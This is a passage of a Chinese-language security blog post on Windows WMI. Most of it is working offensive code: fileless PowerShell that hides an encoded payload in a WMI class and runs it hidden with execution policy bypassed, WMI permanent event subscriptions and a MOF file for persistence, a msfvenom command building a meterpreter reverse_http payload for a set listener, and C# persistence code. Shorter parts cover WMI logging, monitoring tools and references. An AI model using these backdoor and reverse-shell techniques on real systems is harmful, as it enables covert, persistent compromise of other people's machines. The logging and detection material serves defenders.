$StaticClass.Name = &quot;Victim_EncodeCommand_Class&quot;    # = StaticClass[&#39;__CLASS&#39;] = &#39;Victim_EncodeCommand_Class&#39;
$StaticClass.put()
$StaticClass.Properties.Add(&#39;EncodeCommand&#39;,$encodedPayload)
$StaticClass.put()

#读取加密payload
$EncodedPayload=([WmiClass] &#39;Victim_EncodeCommand_Class&#39;).Properties[&#39;EncodeCommand&#39;].Value
#PowerShell直接执行命令 or wmi 永久事件订阅作为持久化后门执行
$PowerShellPayload = &quot;powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload&quot;
Invoke-WmiMethod  -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
#显示解密指令
$bytes2  = [System.Convert]::FromBase64String($EncodedPayload);
$decoded = [System.Text.Encoding]::Unicode.GetString($bytes2); 
&quot;decoded Payload:&quot;
$decoded

</code></pre>
<p>使用<strong>WMI永久事件订阅</strong>(permanent event subscriptions)机制来触发特定操作,完成本地持久化。</p>
<pre><code class="powershell">​
#读取加密指令
$EncodedPayload=([WmiClass] &#39;Win32_Command&#39;).Properties[&#39;EnCommand&#39;].Value
# or $exePath=&#39;C:\Windows\Temp\evil.exe&#39;

# 构造 WMI永久事件订阅(permanent event subscriptions) 
$filterName=&#39;EvilFilter&#39;​
$consumerName=&#39;EvilConsumer&#39;

# 1. 创建一个 事件过滤器__EventFilter,用于设定触发条件,每隔60s执行一次
$Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;&quot;
# or $Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39; AND TargetInstance.SystemUpTime &gt;= 200 AND TargetInstance.SystemUpTime &lt; 320&quot;
# 事件筛选器在系统启动后的 200 和 320 秒之间被当作一个触发器。在事件被触发时事件消费者会使用 CommandLineEventConsumer 执行已指定好的可执行文件。
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace &quot;root\subscription&quot; -Arguments @{Name=$filterName;EventNameSpace=&quot;root\cimv2&quot;;QueryLanguage=&quot;WQL&quot;;Query=$Query} -ErrorAction Stop

# 2. 创建一个 事件消费者 CommandLineEventConsumer ,用于设定执行的操作
$Arg =@{Name=$consumerName;CommandLineTemplate=&quot;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe  -NonInteractive  -enc $EncodedPayload&quot;}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace &quot;root\subscription&quot; -Arguments $Arg

# 3. 绑定filter和consumer

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace &quot;root\subscription&quot; -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

</code></pre>
<p>运行ps1</p>
<pre><code class="csharp">
# Client 
PS C:\Client\WMI&gt; . .\1.ps1

Path          : \\.\root\cimv2:Victim_EncodeCommand_Class
RelativePath  : Victim_EncodeCommand_Class
Server        : .
NamespacePath : root\cimv2
ClassName     : Victim_EncodeCommand_Class
IsClass       : True
IsInstance    : False
IsSingleton   : False

Path          : \\OWA2013\ROOT\cimv2:Victim_EncodeCommand_Class
RelativePath  : Victim_EncodeCommand_Class
Server        : OWA2013
NamespacePath : ROOT\cimv2
ClassName     : Victim_EncodeCommand_Class
IsClass       : True
IsInstance    : False
IsSingleton   : False

__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer=&quot;CommandLineEventConsumer.Name=\&quot;EvilConsumer\&quot;&quot;,Filter=&quot;_
                          _EventFilter.Name=\&quot;EvilFilter\&quot;&quot;
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : OWA2013
__NAMESPACE             : ROOT\subscription
__PATH                  : \\OWA2013\ROOT\subscription:__FilterToConsumerBinding.Consumer=&quot;CommandLineEventConsumer.Name
                          =\&quot;EvilConsumer\&quot;&quot;,Filter=&quot;__EventFilter.Name=\&quot;EvilFilter\&quot;&quot;
Consumer                : CommandLineEventConsumer.Name=&quot;EvilConsumer&quot;
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : __EventFilter.Name=&quot;EvilFilter&quot;
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : OWA2013



# server 
PS C:\Server\&gt; ([WMIClass] &#39;Victim_Info&#39;).Properties[&#39;victim_ip_10_1_0_213&#39;]

    Name       : victim_ip_10_1_0_213
    Value      : Run Command Process : 12/09/2019 15:11:34
    Type       : String
    IsLocal    : True
    IsArray    : False
    Origin     : Victim_Info
    Qualifiers : {CIMTYPE}

</code></pre>
<h3 id="MOF-后门"><a href="#MOF-后门" class="headerlink" title="MOF 后门"></a>MOF 后门</h3><pre><code class="csharp">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)    

instance of __EventFilter as $EventFilter
{
    EventNamespace = &quot;Root\\Cimv2&quot;;
    Name  = &quot;MyFilter&quot;;
    //Query = &quot;Select * From __InstanceModificationEvent &quot;
            //&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;
            //&quot;And TargetInstance.Second = 1&quot;;
    Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA \&quot;Win32_Service\&quot; AND TargetInstance.Name = \&quot;winrm\&quot; AND TargetInstance.State = \&quot;Stopped\&quot;&quot;;
    QueryLanguage = &quot;WQL&quot;;
};    

instance of CommandLineEventConsumer as $Consumer
{
    Name = &quot;MyConsumer&quot;;
    CommandLineTemplate = &quot;powershell -Command \&quot;get-date &gt;&gt;C:\\windows\\Temp\\getdate.txt\&quot;&quot;;
    ExecutablePath = &quot;C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe&quot;;
    //ScriptingEngine = &quot;JScript&quot;;
    //ScriptText = &quot;GetObject(\&quot;script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\&quot;)&quot;;
};    

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
</code></pre>
<h2 id="0x07-WMI-日志"><a href="#0x07-WMI-日志" class="headerlink" title="0x07 WMI 日志"></a>0x07 WMI 日志</h2><p>在2012年之前，Windows系统中的WMI Activity事件日志程序主要用于在WMI启用时记录其跟踪和调试信息</p>
<p>但在Windows新发行版本中扩展了该程序的功能，使用Operational选项可以对WMI的操作行为进行记录。</p>
<pre><code class="Powershell">Get-WinEvent -ListProvider &quot;Microsoft-Windows-WMI-Activity&quot; | fl  *  ## (  Format-List -Property *  )

    ProviderName      : Microsoft-Windows-WMI-Activity
    Name              : Microsoft-Windows-WMI-Activity
    Id                : 1418ef04-b0b4-4623-bf7e-d74ab47bbdaa
    MessageFilePath   : C:\Windows\system32\wbem\WinMgmtR.dll
    ResourceFilePath  : C:\Windows\system32\wbem\WinMgmtR.dll
    ParameterFilePath :
    HelpLink          : http://go.microsoft.com/fwlink/events.asp?CoName=Microsoft Corporation&amp;ProdName=Microsoft®
                        Windows® Operating System&amp;ProdVer=10.0.14393.0&amp;FileName=WinMgmtR.dll&amp;FileVer=10.0.14393.0
    DisplayName       : Microsoft-Windows-WMI-Activity
    LogLinks          : {Microsoft-Windows-WMI-Activity/Trace, Microsoft-Windows-WMI-Activity/Operational,
                        Microsoft-Windows-WMI-Activity/Debug}
    Levels            : {win:Error, win:Informational}
    Opcodes           : {}
    Keywords          : {}
    Tasks             : {}
    Events            : {1, 2, 3, 11...}

(Get-WinEvent -ListProvider &quot;Microsoft-Windows-WMI-Activity&quot;).loglinks
    LogName                                    IsImported DisplayName
    -------                                    ---------- -----------
    Microsoft-Windows-WMI-Activity/Trace            False
    Microsoft-Windows-WMI-Activity/Operational      False
    Microsoft-Windows-WMI-Activity/Debug            False

(Get-WinEvent -ListProvider &quot;Microsoft-Windows-WMI-Activity&quot;).Events | Measure-Object
    Count    : 22   # Provider 生成了22个事件
    Average  :
    Sum      :
    Maximum  :
    Minimum  :
    Property :
# Measure-Object能够支持求和，求平均值，取最大值，取最小值，统计行数，单词数，字符数


</code></pre>
<p>当在WMI CIM数据库中创建一个持久事件时，系统同时还会创建Id为5861的事件日志条目，记录着过滤器与消费者详细信息。</p>
<h2 id="0x08-学习脚本"><a href="#0x08-学习脚本" class="headerlink" title="0x08 学习脚本"></a>0x08 学习脚本</h2><h3 id="Monitor-WMI-Persistence"><a href="#Monitor-WMI-Persistence" class="headerlink" title="Monitor WMI Persistence"></a>Monitor WMI Persistence</h3><p>相关</p>
<pre><code>[WMIMonitor](https://github.com/realparisi/WMI_Monitor/blob/master/WMIMonitor.ps1)

[fireeye - wmi_vs_wmi_monitor](https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html)
</code></pre><p>Application Event log - EventID 8</p>
<p>.INSTRUCTIONS</p>
<pre><code>1) Execute the script from an Administrative PowerShell console &quot;Import-Module ./WMIMonitor.ps1&quot;
The functions &quot;New-EventSubscriberMonitor&quot; and &quot;Remove-SubscriberMonitor&quot; will now be loaded into your system&#39;s PowerShell instance
2) Type &quot;New-EventSubscriberMonitor&quot; to invoke the function and start recording WMI process creations and Consumers
3) Type &quot;Remove-SubscriberMonitor&quot; to remove the WMI subscriber created and discontinue logging the events
4) In a new PowerShell window, test a process call create function &quot;wmic process call create &quot;notepad.exe&quot;&quot; and check the Application Event Log to ensure the script is logging


[WMImplant](https://github.com/ChrisTruncer/WMImplant/blob/master/WMImplant.ps1)
[WMI-Persistence.ps1]()
[PowerSploit - Persistence](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Persistence/Persistence.psm1)
</code></pre><h3 id="WMIPersistence-C"><a href="#WMIPersistence-C" class="headerlink" title="WMIPersistence - C"></a>WMIPersistence - C</h3><p><a href="https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs" target="_blank" rel="noopener">mdsecactivebreach - WMIPersist.cs</a><br><a href="https://github.com/mdsecactivebreach/SharpShooter" target="_blank" rel="noopener">mdsecactivebreach - SharpShooter.py</a></p>
<p>先使用msfvenom生成shellcode_raw.txt</p>
<pre><code>./msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.221 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o shellcode_raw.txt
</code></pre><p>本示例执行的是 VBScript,使用SharpShooter生成 VBScript 类型的 payload。</p>
<pre><code>python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output implantvbs --rawscfile shellcode_raw.txt
</code></pre><ol>
<li><p>CSharp 调用 VBScript 脚本payload (没试成功)</p>
</li>
<li><p>CSharp 调用 wmi技术执行命令</p>
<p> <a href="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/--eventfilter" target="_blank" rel="noopener">CSharp 中 __EventFilter 类的一些属性</a><br> <a href="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/commandlineeventconsumer" target="_blank" rel="noopener">CSharp 中 CommandLineEventConsumer 类的一些属性</a></p>
</li>
</ol>
<pre><code class="csharp">
// WMI Event Subscription Peristence Demo
// Author: @domchell

using System;
using System.Text;
using System.Management;

namespace WMIPersistence
{
    class Program
    {
        static void Main(string[] args)
        {
            PersistWMI();
        }

        static void PersistWMI()
        {
            ManagementObject myEventFilter = null;
            ManagementObject myEventConsumer = null;
            ManagementObject myBinder = null;

            try
            {
                ManagementScope scope = new ManagementScope(@&quot;\\.\root\subscription&quot;);

                ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath(&quot;__EventFilter&quot;), null);
                String strQuery = @&quot;SELECT * FROM __InstanceModificationEvent WITHIN 5 &quot; + &quot;WHERE TargetInstance ISA \&quot;Win32_Service\&quot;&quot; + &quot;AND TargetInstance.Name = \&quot;winrm\&quot;&quot; 
                    + &quot;AND TargetInstance.State = \&quot;Stopped\&quot;&quot;;

                WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
                myEventFilter = wmiEventFilter.CreateInstance();
                myEventFilter[&quot;Name&quot;] = &quot;demoEventFilter&quot;;
                myEventFilter[&quot;Query&quot;] = myEventQuery.QueryString;
                myEventFilter[&quot;QueryLanguage&quot;] = myEventQuery.QueryLanguage;
                myEventFilter[&quot;EventNameSpace&quot;] = @&quot;\root\cimv2&quot;;
                myEventFilter.Put();
                Console.WriteLine(&quot;[*] Event filter created.&quot;);

                myEventConsumer = new ManagementClass(scope, new ManagementPath(&quot;CommandLineEventConsumer&quot;), null).CreateInstance();
                myEventConsumer[&quot;Name&quot;] = &quot;MyCommandline&quot;;
                myEventConsumer[&quot;CommandLineTemplate&quot;] = &quot;powershell -Command \&quot;get-date &gt;&gt;C:\\windows\\Temp\\getdate.txt\&quot;&quot;;
                myEventConsumer[&quot;ExecutablePath&quot;] = &quot;C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe&quot;;
                myEventConsumer.Put();

                Console.WriteLine(&quot;[*] Event consumer created.&quot;);

                myBinder = new ManagementClass(scope, new ManagementPath(&quot;__FilterToConsumerBinding&quot;),null).CreateInstance();
                myBinder[&quot;Filter&quot;] = myEventFilter.Path.RelativePath;
                myBinder[&quot;Consumer&quot;] = myEventConsumer.Path.RelativePath;
                myBinder.Put();

                Console.WriteLine(&quot;[*] Subscription created&quot;);
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            } // END CATCH
            Console.ReadKey();
        } // END FUNC
    } // END CLASS
} // END NAMESPACE

</code></pre>
<p><img src="/2019/12/04/Windows WMI技术总结/./wmi/csharp_wmi.PNG" alt="csharp_wmi"></p>
<h2 id="0x08-Conference"><a href="#0x08-Conference" class="headerlink" title="0x08 Conference"></a>0x08 Conference</h2><pre><code>[WMI的攻击、防御和取证技巧白皮书 - Windows Management Instrumentation (WMI) Forensics | Whitepaper | FireEye](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf) - https://www.fireeye.com/search.html?q=wmi
[WMI技术有关的其他攻击活动信息](https://files.sans.org/summit/Digital_Forensics_and_Incident_Response_Summit_2015/PDFs/TheresSomethingAboutWMIDevonKerr.pdf)
[翻译 : WMI 的攻击,防御与取证分析技术之攻击篇](https://www.secpulse.com/archives/39555.html)
[Powershell攻击指南黑客后渗透之道系列 - 进阶利用](https://www.anquanke.com/post/id/88851)
[WMI Architecture](https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/wmi-architecture)
[WMI Shell](http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf)
[Powershell+WMI事件订阅](https://blog.csdn.net/stisom/article/details/81343808)
[解析APT29的无文件WMI和PowerShell后门](https://www.anquanke.com/post/id/85851)
[WMI Backdoor](http://bobao.360.cn/learning/detail/628.html)
[那些追踪WMI Activity的基本方法](https://www.anquanke.com/post/id/87041)
[WMI Defense – 三好学生](https://wooyun.x10sec.org/static/drops/tips-8290.html)
[WSC、JSRAT and WMI Backdoor - 三好学生](https://wooyun.x10sec.org/static/drops/tips-15575.html)
[WMIC 事件订阅](https://rcoil.me/2019/05/%E3%80%90%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E3%80%91WMIC%20%E4%BA%8B%E4%BB%B6%E8%AE%A2%E9%98%85/)
</code></pre><h2 id="0x09-延伸"><a href="#0x09-延伸" class="headerlink" title="0x09 延伸"></a>0x09 延伸</h2><pre><code>Powershell DSC
[FireEye - WMI仓库解析工具](https://github.com/fireeye/flare-wmi/tree/master/python-cim)
[围绕PowerShell事件日志记录的攻防博弈战](http://blog.nsfocus.net/attacks-defenses-powershell-event-logging/)
[Greater Visibility Through PowerShell Logging](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html)
[命名管道](https://rcoil.me/2019/11/%E3%80%90%E7%9F%A5%E8%AF%86%E5%9B%9E%E9%A1%BE%E3%80%91%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93/)
[Powershell之MOF后门]()
</code></pre>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/笔记/" rel="tag"># 笔记</a>
          
            <a href="/tags/Windows/" rel="tag"># Windows</a>
          
            <a href="/tags/WMI/" rel="tag"># WMI</a>
          
            <a href="/tags/后门/" rel="tag"># 后门</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/12/04/Windows 身份验证体系结构/" rel="next" title="Windows身份验证体系结构">
                <i class="fa fa-chevron-left"></i> Windows身份验证体系结构
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/jacksparrow.png"
                alt="Sparrow" />
            
              <p class="site-author-name" itemprop="name">Sparrow</p>
              <p class="site-description motion-element" itemprop="description">唯有时间不可挡</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/xxxxxxxxxxxxxxxxxxxx" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:3sparrow@protonmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                有趣的人
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/xxxxxxxxxxxxxxxxxxxxxxxxxx" title="以前的CSDN" target="_blank">以前的CSDN</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.c0smx.com/" title="dalao c0sMx" target="_blank">dalao c0sMx</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zeringzxh.github.io/" title="zering" target="_blank">zering</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-WMI-Windows-管理规范"><span class="nav-text">0x00 WMI - Windows 管理规范</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-WMI基础结构"><span class="nav-text">0x01 WMI基础结构</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-WMI-consumers-WMI使用者"><span class="nav-text">1. WMI consumers - WMI使用者</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-WMI-Infrastructure-WMI基础结构"><span class="nav-text">2. WMI Infrastructure - WMI基础结构</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Managed-object-and-WMI-providers-托管对象和WMI提供者"><span class="nav-text">3. Managed object and WMI providers - 托管对象和WMI提供者</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Winmgmt-WMI服务"><span class="nav-text">4. Winmgmt - WMI服务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-MOF-托管对象格式-Managed-Object-Format"><span class="nav-text">5. MOF - 托管对象格式 Managed Object Format</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#MOF-中的命名空间"><span class="nav-text">MOF 中的命名空间</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#mof文件记录注册表修改"><span class="nav-text">mof文件记录注册表修改</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-WMI-namespaces-命名空间"><span class="nav-text">6. WMI namespaces 命名空间</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-WMI-查询"><span class="nav-text">0x02 WMI 查询</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-WQL"><span class="nav-text">1. WQL</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-实例查询"><span class="nav-text">2. 实例查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-事件查询"><span class="nav-text">3. 事件查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-元查询"><span class="nav-text">4. 元查询</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-WMI-交互"><span class="nav-text">0x03 WMI 交互</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-PowerShell"><span class="nav-text">1. PowerShell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#获取WMI对象-Get-WmiObject"><span class="nav-text">获取WMI对象: Get-WmiObject</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-wmic-exe"><span class="nav-text">2. wmic.exe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-wbemtest-exe"><span class="nav-text">3. wbemtest.exe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-WMI-Explorer"><span class="nav-text">4. WMI Explorer</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-CIM-Common-Information-Model"><span class="nav-text">5. CIM - Common Information Model</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-Windows-脚本宿主-WSH-语言"><span class="nav-text">6. Windows 脚本宿主(WSH)语言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-C-C-调用-IWbem-COM-API"><span class="nav-text">7. C/C++ 调用 IWbem* COM API</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-Net-System-Management-类"><span class="nav-text">8. .Net System.Management 类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-winrm-exe-Windows-远程管理-WinRM"><span class="nav-text">9. winrm.exe - Windows 远程管理 (WinRM)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-wmiexec-vbs"><span class="nav-text">10. wmiexec.vbs</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-WMI-permanent-event-subscriptions-永久事件订阅"><span class="nav-text">0x04 WMI permanent event subscriptions 永久事件订阅</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-事件筛选器-Event-filter"><span class="nav-text">1.事件筛选器(Event filter)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-事件消费者-Event-Consumers"><span class="nav-text">2.事件消费者(Event Consumers)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-消费者绑定筛选器-A-filter-to-consumer-binding"><span class="nav-text">3.消费者绑定筛选器(A filter to consumer binding)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Powershell-实例"><span class="nav-text">4. Powershell 实例</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-查看当前WMI-Event及移除"><span class="nav-text">5. 查看当前WMI Event及移除</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-Intrinsic-Events-内部事件"><span class="nav-text">6. Intrinsic Events 内部事件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-Extrinsic-Events-外部事件"><span class="nav-text">7. Extrinsic Events 外部事件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-WMI-信息收集及事件触发行为"><span class="nav-text">0x05 WMI 信息收集及事件触发行为</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-系统侦察"><span class="nav-text">1. 系统侦察</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-反病毒-虚拟机检测"><span class="nav-text">2. 反病毒/虚拟机检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-VMware-虚拟机检测"><span class="nav-text">3. VMware 虚拟机检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-WMI-事件触发行为"><span class="nav-text">4. WMI 事件触发行为</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-WMI-Backdoor"><span class="nav-text">0x06 WMI Backdoor</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#powershell-无文件使用WMI技术执行后门"><span class="nav-text">powershell 无文件使用WMI技术执行后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MOF-后门"><span class="nav-text">MOF 后门</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x07-WMI-日志"><span class="nav-text">0x07 WMI 日志</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x08-学习脚本"><span class="nav-text">0x08 学习脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Monitor-WMI-Persistence"><span class="nav-text">Monitor WMI Persistence</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WMIPersistence-C"><span class="nav-text">WMIPersistence - C</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x08-Conference"><span class="nav-text">0x08 Conference</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x09-延伸"><span class="nav-text">0x09 延伸</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sparrow</span>

  
</div>






  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a></div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: true,
        appId: 'XzzzFqxY7zSnAm9am6FHg6do-gzGzoHsz',
